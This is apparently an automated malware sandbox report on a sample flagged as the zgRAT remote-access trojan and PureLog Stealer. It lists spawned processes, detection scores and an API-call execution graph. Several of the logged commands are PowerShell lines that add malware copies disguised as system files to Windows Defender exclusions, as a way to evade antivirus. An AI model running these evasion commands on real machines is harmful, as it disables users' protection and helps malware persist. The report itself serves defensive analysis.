                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 79%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:24
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'
                                                                                      Imagebase:0x7ff760310000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:25
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                                                                      Imagebase:0x7ff760310000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:26
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:27
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                                                                      Imagebase:0x7ff760310000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:28
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:29
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'
                                                                                      Imagebase:0x7ff760310000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:30
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      Target ID:31
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                                                                      Imagebase:0x7ff760310000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:32
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      Target ID:33
                                                                                      Start time:07:16:56
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'
                                                                                      Imagebase:0x7ff760310000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:34
                                                                                      Start time:07:16:57
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      Target ID:35
                                                                                      Start time:07:16:57
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      Target ID:36
                                                                                      Start time:07:16:57
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      Imagebase:0x30000
                                                                                      File size:2'545'152 bytes
                                                                                      MD5 hash:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:37
                                                                                      Start time:07:16:57
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      Imagebase:0x880000
                                                                                      File size:2'545'152 bytes
                                                                                      MD5 hash:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:38
                                                                                      Start time:07:16:57
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      Imagebase:0x2d0000
                                                                                      File size:2'545'152 bytes
                                                                                      MD5 hash:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 79%, ReversingLabs
                                                                                      Has exited:true

                                                                                      Target ID:39
                                                                                      Start time:07:16:57
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat"
                                                                                      Imagebase:0x7ff617870000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:40
                                                                                      Start time:07:16:57
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:41
                                                                                      Start time:07:16:57
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      Imagebase:0x770000
                                                                                      File size:2'545'152 bytes
                                                                                      MD5 hash:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:46
                                                                                      Start time:07:16:59
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:chcp 65001
                                                                                      Imagebase:0x7ff637580000
                                                                                      File size:14'848 bytes
                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:47
                                                                                      Start time:07:16:59
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:ping -n 10 localhost
                                                                                      Imagebase:0x7ff7a7e90000
                                                                                      File size:22'528 bytes
                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:49
                                                                                      Start time:07:17:04
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                      Imagebase:0x7ff72d8c0000
                                                                                      File size:496'640 bytes
                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:50
                                                                                      Start time:07:17:09
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Program Files\Windows NT\smss.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Windows NT\smss.exe"
                                                                                      Imagebase:0xab0000
                                                                                      File size:2'545'152 bytes
                                                                                      MD5 hash:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\smss.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\smss.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 79%, ReversingLabs
                                                                                      Has exited:true

                                                                                      Target ID:51
                                                                                      Start time:07:17:13
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat"
                                                                                      Imagebase:0x7ff617870000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:52
                                                                                      Start time:07:17:13
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:53
                                                                                      Start time:07:17:13
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:chcp 65001
                                                                                      Imagebase:0x7ff637580000
                                                                                      File size:14'848 bytes
                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:54
                                                                                      Start time:07:17:13
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\w32tm.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      Imagebase:0x7ff765fd0000
                                                                                      File size:108'032 bytes
                                                                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:55
                                                                                      Start time:07:17:18
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Program Files\Windows NT\smss.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Windows NT\smss.exe"
                                                                                      Imagebase:0x750000
                                                                                      File size:2'545'152 bytes
                                                                                      MD5 hash:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:56
                                                                                      Start time:07:17:21
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
                                                                                      Imagebase:0x7ff617870000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:57
                                                                                      Start time:07:17:21
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:58
                                                                                      Start time:07:17:21
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:chcp 65001
                                                                                      Imagebase:0x7ff637580000
                                                                                      File size:14'848 bytes
                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:59
                                                                                      Start time:07:17:21
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:ping -n 10 localhost
                                                                                      Imagebase:0x7ff7a7e90000
                                                                                      File size:22'528 bytes
                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.5%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:9.4%
                                                                                        Total number of Nodes:1498
                                                                                        Total number of Limit Nodes:28
                                                                                        execution_graph 25468 1c1710 86 API calls 25469 1dad10 72 API calls 25419 1da400 GdipDisposeImage GdipFree 25420 1dd600 69 API calls 25421 1e6000 QueryPerformanceFrequency QueryPerformanceCounter 25423 1ef200 51 API calls 25471 1e2900 6 API calls 4 library calls 25473 1ea700 21 API calls 25475 1df530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25476 1dff30 LocalFree 23561 1ebb30 23562 1ebb42 23561->23562 23563 1ebb39 23561->23563 23565 1eba27 23563->23565 23585 1e97e5 GetLastError 23565->23585 23567 1eba34 23605 1ebb4e 23567->23605 23569 1eba3c 23614 1eb7bb 23569->23614 23574 1eba96 23639 1e8dcc 23574->23639 23578 1eba91 23638 1e91a8 20 API calls __dosmaperr 23578->23638 23579 1eba53 23579->23562 23581 1ebada 23581->23574 23645 1eb691 26 API calls 23581->23645 23582 1ebaae 23582->23581 23583 1e8dcc _free 20 API calls 23582->23583 23583->23581 23586 1e97fb 23585->23586 23587 1e9801 23585->23587 23646 1eae5b 11 API calls 2 library calls 23586->23646 23591 1e9850 SetLastError 23587->23591 23647 1eb136 23587->23647 23591->23567 23592 1e981b 23594 1e8dcc _free 20 API calls 23592->23594 23596 1e9821 23594->23596 23595 1e9830 23595->23592 23597 1e9837 23595->23597 23598 1e985c SetLastError 23596->23598 23655 1e9649 20 API calls __dosmaperr 23597->23655 23656 1e8d24 38 API calls _abort 23598->23656 23600 1e9842 23602 1e8dcc _free 20 API calls 23600->23602 23604 1e9849 23602->23604 23604->23591 23604->23598 23606 1ebb5a ___scrt_is_nonwritable_in_current_image 23605->23606 23607 1e97e5 _unexpected 38 API calls 23606->23607 23608 1ebb64 23607->23608 23611 1ebbe8 _abort 23608->23611 23613 1e8dcc _free 20 API calls 23608->23613 23659 1e8d24 38 API calls _abort 23608->23659 23660 1eac31 EnterCriticalSection 23608->23660 23661 1ebbdf LeaveCriticalSection _abort 23608->23661 23611->23569 23613->23608 23662 1e4636 23614->23662 23617 1eb7ee 23619 1eb7f3 GetACP 23617->23619 23620 1eb805 23617->23620 23618 1eb7dc GetOEMCP 23618->23620 23619->23620 23620->23579 23621 1e8e06 23620->23621 23622 1e8e44 23621->23622 23626 1e8e14 __dosmaperr 23621->23626 23673 1e91a8 20 API calls __dosmaperr 23622->23673 23623 1e8e2f RtlAllocateHeap 23625 1e8e42 23623->23625 23623->23626 23625->23574 23628 1ebbf0 23625->23628 23626->23622 23626->23623 23672 1e7a5e 7 API calls 2 library calls 23626->23672 23629 1eb7bb 40 API calls 23628->23629 23630 1ebc0f 23629->23630 23633 1ebc60 IsValidCodePage 23630->23633 23635 1ebc16 23630->23635 23637 1ebc85 __cftof 23630->23637 23632 1eba89 23632->23578 23632->23582 23634 1ebc72 GetCPInfo 23633->23634 23633->23635 23634->23635 23634->23637 23684 1dfbbc 23635->23684 23674 1eb893 GetCPInfo 23637->23674 23638->23574 23640 1e8dd7 RtlFreeHeap 23639->23640 23641 1e8e00 _free 23639->23641 23640->23641 23642 1e8dec 23640->23642 23641->23579 23765 1e91a8 20 API calls __dosmaperr 23642->23765 23644 1e8df2 GetLastError 23644->23641 23645->23574 23646->23587 23652 1eb143 __dosmaperr 23647->23652 23648 1eb183 23658 1e91a8 20 API calls __dosmaperr 23648->23658 23649 1eb16e RtlAllocateHeap 23650 1e9813 23649->23650 23649->23652 23650->23592 23654 1eaeb1 11 API calls 2 library calls 23650->23654 23652->23648 23652->23649 23657 1e7a5e 7 API calls 2 library calls 23652->23657 23654->23595 23655->23600 23657->23652 23658->23650 23660->23608 23661->23608 23663 1e4653 23662->23663 23669 1e4649 23662->23669 23664 1e97e5 _unexpected 38 API calls 23663->23664 23663->23669 23665 1e4674 23664->23665 23670 1e993a 38 API calls __cftof 23665->23670 23667 1e468d 23671 1e9967 38 API calls __cftof 23667->23671 23669->23617 23669->23618 23670->23667 23671->23669 23672->23626 23673->23625 23675 1eb977 23674->23675 23679 1eb8cd 23674->23679 23678 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23675->23678 23681 1eba23 23678->23681 23691 1ec988 23679->23691 23681->23635 23683 1eab78 __vsnwprintf_l 43 API calls 23683->23675 23685 1dfbc5 IsProcessorFeaturePresent 23684->23685 23686 1dfbc4 23684->23686 23688 1dfc07 23685->23688 23686->23632 23764 1dfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23688->23764 23690 1dfcea 23690->23632 23692 1e4636 __cftof 38 API calls 23691->23692 23693 1ec9a8 MultiByteToWideChar 23692->23693 23695 1ec9e6 23693->23695 23703 1eca7e 23693->23703 23697 1e8e06 __vsnwprintf_l 21 API calls 23695->23697 23700 1eca07 __cftof __vsnwprintf_l 23695->23700 23696 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23698 1eb92e 23696->23698 23697->23700 23705 1eab78 23698->23705 23699 1eca78 23710 1eabc3 20 API calls _free 23699->23710 23700->23699 23702 1eca4c MultiByteToWideChar 23700->23702 23702->23699 23704 1eca68 GetStringTypeW 23702->23704 23703->23696 23704->23699 23706 1e4636 __cftof 38 API calls 23705->23706 23707 1eab8b 23706->23707 23711 1ea95b 23707->23711 23710->23703 23712 1ea976 __vsnwprintf_l 23711->23712 23713 1ea99c MultiByteToWideChar 23712->23713 23714 1ea9c6 23713->23714 23715 1eab50 23713->23715 23718 1e8e06 __vsnwprintf_l 21 API calls 23714->23718 23721 1ea9e7 __vsnwprintf_l 23714->23721 23716 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23715->23716 23717 1eab63 23716->23717 23717->23683 23718->23721 23719 1eaa30 MultiByteToWideChar 23720 1eaa49 23719->23720 23733 1eaa9c 23719->23733 23738 1eaf6c 23720->23738 23721->23719 23721->23733 23725 1eaa73 23728 1eaf6c __vsnwprintf_l 11 API calls 23725->23728 23725->23733 23726 1eaaab 23727 1e8e06 __vsnwprintf_l 21 API calls 23726->23727 23734 1eaacc __vsnwprintf_l 23726->23734 23727->23734 23728->23733 23729 1eab41 23746 1eabc3 20 API calls _free 23729->23746 23730 1eaf6c __vsnwprintf_l 11 API calls 23732 1eab20 23730->23732 23732->23729 23735 1eab2f WideCharToMultiByte 23732->23735 23747 1eabc3 20 API calls _free 23733->23747 23734->23729 23734->23730 23735->23729 23736 1eab6f 23735->23736 23748 1eabc3 20 API calls _free 23736->23748 23749 1eac98 23738->23749 23742 1eaf9c 23744 1dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23742->23744 23743 1eafdc LCMapStringW 23743->23742 23745 1eaa60 23744->23745 23745->23725 23745->23726 23745->23733 23746->23733 23747->23715 23748->23733 23750 1eacc8 23749->23750 23753 1eacc4 23749->23753 23750->23742 23756 1eaff4 10 API calls 3 library calls 23750->23756 23751 1eace8 23751->23750 23754 1eacf4 GetProcAddress 23751->23754 23753->23750 23753->23751 23757 1ead34 23753->23757 23755 1ead04 __dosmaperr 23754->23755 23755->23750 23756->23743 23758 1ead4a 23757->23758 23759 1ead55 LoadLibraryExW 23757->23759 23758->23753 23760 1ead72 GetLastError 23759->23760 23763 1ead8a 23759->23763 23762 1ead7d LoadLibraryExW 23760->23762 23760->23763 23761 1eada1 FreeLibrary 23761->23758 23762->23763 23763->23758 23763->23761 23764->23690 23765->23644 25425 1ec030 GetProcessHeap 25426 1c1025 29 API calls 25427 1dc220 92 API calls _swprintf 25429 1ef421 21 API calls __vsnwprintf_l 24397 1dcd58 24399 1dce22 24397->24399 24404 1dcd7b 24397->24404 24413 1dc793 _wcslen _wcsrchr 24399->24413 24425 1dd78f 24399->24425 24401 1dd40a 24403 1d1fbb CompareStringW 24403->24404 24404->24399 24404->24403 24405 1dca67 SetWindowTextW 24405->24413 24410 1dc855 SetFileAttributesW 24412 1dc90f GetFileAttributesW 24410->24412 24423 1dc86f __cftof _wcslen 24410->24423 24412->24413 24415 1dc921 DeleteFileW 24412->24415 24413->24401 24413->24405 24413->24410 24417 1dcc31 GetDlgItem SetWindowTextW SendMessageW 24413->24417 24419 1dcc71 SendMessageW 24413->24419 24424 1d1fbb CompareStringW 24413->24424 24449 1db314 24413->24449 24453 1da64d GetCurrentDirectoryW 24413->24453 24455 1ca5d1 6 API calls 24413->24455 24456 1ca55a FindClose 24413->24456 24457 1db48e 76 API calls 2 library calls 24413->24457 24458 1e3e3e 24413->24458 24415->24413 24416 1dc932 24415->24416 24418 1c4092 _swprintf 51 API calls 24416->24418 24417->24413 24420 1dc952 GetFileAttributesW 24418->24420 24419->24413 24420->24416 24421 1dc967 MoveFileW 24420->24421 24421->24413 24422 1dc97f MoveFileExW 24421->24422 24422->24413 24423->24412 24423->24413 24454 1cb991 51 API calls 2 library calls 24423->24454 24424->24413 24426 1dd799 __cftof _wcslen 24425->24426 24427 1dd9c0 24426->24427 24428 1dd8a5 24426->24428 24431 1dd9e7 24426->24431 24474 1d1fbb CompareStringW 24426->24474 24427->24431 24433 1dd9de ShowWindow 24427->24433 24471 1ca231 24428->24471 24431->24413 24433->24431 24434 1dd8d9 ShellExecuteExW 24434->24431 24441 1dd8ec 24434->24441 24436 1dd8d1 24436->24434 24437 1dd925 24476 1ddc3b 6 API calls 24437->24476 24438 1dd97b CloseHandle 24439 1dd989 24438->24439 24440 1dd994 24438->24440 24477 1d1fbb CompareStringW 24439->24477 24440->24427 24441->24437 24441->24438 24443 1dd91b ShowWindow 24441->24443 24443->24437 24445 1dd93d 24445->24438 24446 1dd950 GetExitCodeProcess 24445->24446 24446->24438 24447 1dd963 24446->24447 24447->24438 24450 1db31e 24449->24450 24451 1db40d 24450->24451 24452 1db3f0 ExpandEnvironmentStringsW 24450->24452 24451->24413 24452->24451 24453->24413 24454->24423 24455->24413 24456->24413 24457->24413 24459 1e8e54 24458->24459 24460 1e8e6c 24459->24460 24461 1e8e61 24459->24461 24462 1e8e74 24460->24462 24469 1e8e7d __dosmaperr 24460->24469 24463 1e8e06 __vsnwprintf_l 21 API calls 24461->24463 24464 1e8dcc _free 20 API calls 24462->24464 24467 1e8e69 24463->24467 24464->24467 24465 1e8ea7 HeapReAlloc 24465->24467 24465->24469 24466 1e8e82 24486 1e91a8 20 API calls __dosmaperr 24466->24486 24467->24413 24469->24465 24469->24466 24487 1e7a5e 7 API calls 2 library calls 24469->24487 24478 1ca243 24471->24478 24474->24428 24475 1cb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24475->24436 24476->24445 24477->24440 24479 1dec50 24478->24479 24480 1ca250 GetFileAttributesW 24479->24480 24481 1ca23a 24480->24481 24482 1ca261 24480->24482 24481->24434 24481->24475 24483 1cbb03 GetCurrentDirectoryW 24482->24483 